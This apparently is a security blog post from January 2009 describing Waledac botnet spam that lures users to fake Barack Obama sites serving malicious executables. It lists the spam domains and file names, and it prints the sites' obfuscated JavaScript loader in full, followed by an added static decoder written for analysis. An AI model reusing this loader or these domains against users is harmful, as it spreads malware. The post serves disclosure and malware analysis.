With the inauguration in full swing, a botnet is sending out emails pointing users to a fake Barack Obama website. The links on these websites lead to viruses. The sites also include obfuscated JavaScript using the name google-analysis.js.
An Example Email:
From: Jessica Carson
Dates: Monday, January 19, 2009 10:09 AM
To:
Subject: Amazing News
Our new president abandoned us http://www.greatobamaonline.com
Yours Sincerely,
Jessica Carson
The pages look like the real deal:
This is the fake:
This is the real one:
The links in the fake pages include (but may change):
- barack.exe
- speech.exe
- file.exe
- usa.exe
Sites that the spam links to:
- greatobamaguide.com
- greatobamaonline.com
- superobamadirect.com
- superobamaonline.com
The botnet is the Waledac botnet, which was last seen during the big “Greeting Cards” spam. This botnet is believed to be the leftovers, or a re-creation, of the Storm botnet.
Below is the JavaScript if anyone wants to tear it apart…
var P51m=Array(63,55,4,19,6,15,9,39,13,24,0,0,0,0,0,0,62,57,11,18,29,32,41,26,59,43,52,48,31,2,37,54,36,30,60,50,28,61,53,22,33,7,56,0,0,0,0,42,0,49,25,27,16,8,20,14,17,0,58,23,12,3,10,35,5,1,51,40,47,38,34,46,44,45,21),urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0=”u0062u0053122Ku006b63u006cSi153163u0056153u0063l165131u004f124u004au0068k1257u006e_u0073K156111u0078K156u0037l16662u0074lu0061u0036162170126u0054cUu007664I154123156147154Kiu0059170u0076Wu0042125u0076172u0031TVGMu0052u0061zO122130u0070u0047104Ju00547154u004bu0039Qu0039Klu0063u0044126u0036u0033u006cu0031114wu0078Su0042mRX143u0075Fu0076l5u0052Vu0032u006fl113cM”,PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc=0,fxAUkDWF=0,udpcgAo7TIU5pa7MHJ5cV8xAul7v8fx=0,PgattkGoK91jIak,Xnkf9=urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0.length,WYPMl5TtI0ePDWHu2Gfw=1024;window.status=’ ‘;for(var IM3UUs34Fm0pR9wgrtW=Math.ceil(Xnkf9/WYPMl5TtI0ePDWHu2Gfw);IM3UUs34Fm0pR9wgrtW>0;IM3UUs34Fm0pR9wgrtW–){PgattkGoK91jIak=”;for(var Dl4P5Bm1_=Math.min(Xnkf9,WYPMl5TtI0ePDWHu2Gfw);Dl4P5Bm1_>0;Dl4P5Bm1_–,Xnkf9–){PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc|=(P51m[urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0.charCodeAt(udpcgAo7TIU5pa7MHJ5cV8xAul7v8fx++)-48])<<fxAUkDWF;if(fxAUkDWF){PgattkGoK91jIak+=String.fromCharCode(165^PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc&255);PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc>>=8;fxAUkDWF-=2}else fxAUkDWF=6}document.write(PgattkGoK91jIak);}
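For anyone tearing the script apart, the decoding loop can be re-implemented statically so the output is returned as a string rather than written into a page. This is an added example, not code from the original post or from the botnet: `decodeStage`, `extractReferences` and the input `2Lxa` are names and data constructed here, and only the lookup table and the XOR constant 165 are taken from the sample above. The string literal as reproduced above appears to have lost its backslash escapes, so a constructed input is used instead.

```javascript
// Lookup table copied from the sample's P51m array: index = charCode - 48,
// value = 6-bit symbol. Alphabet is 0-9, @, A-Z, _, a-z (64 symbols).
const TABLE = [63,55,4,19,6,15,9,39,13,24,0,0,0,0,0,0,62,57,11,18,29,32,41,26,
  59,43,52,48,31,2,37,54,36,30,60,50,28,61,53,22,33,7,56,0,0,0,0,42,0,49,25,
  27,16,8,20,14,17,0,58,23,12,3,10,35,5,1,51,40,47,38,34,46,44,45,21];
const XOR_KEY = 165; // constant XORed into every output byte in the sample

// Static re-implementation of the sample's loop. It returns the decoded text
// instead of passing it to document.write, so nothing is rendered or executed.
// The sample's 1024-character chunking only controls how often document.write
// is called; the accumulator carries across chunks, so it is omitted here.
function decodeStage(encoded, table = TABLE, xorKey = XOR_KEY) {
  let acc = 0, shift = 0, out = '';
  for (let i = 0; i < encoded.length; i++) {
    // Characters outside the table count as 0, matching undefined << n in the original.
    const sym = table[encoded.charCodeAt(i) - 48] || 0;
    acc |= sym << shift;            // pack 6 bits, least significant first
    if (shift) {
      out += String.fromCharCode(xorKey ^ (acc & 255)); // emit one byte
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6;                    // first symbol of a 4-symbol group: no byte yet
    }
  }
  return out;
}

// Pull src/href values out of decoded markup as inert strings for triage.
function extractReferences(decoded) {
  const refs = [];
  const re = /\b(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(decoded)) !== null) refs.push(m[1]);
  return refs;
}

// Constructed input: "2Lxa" was hand-encoded for this example and decodes to "abc".
console.log(JSON.stringify(decodeStage('2Lxa')));
```

The scheme is a base64-style 4-symbols-to-3-bytes packing with a shuffled alphabet and a single-byte XOR, so the same function handles other samples once their table and key are substituted.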

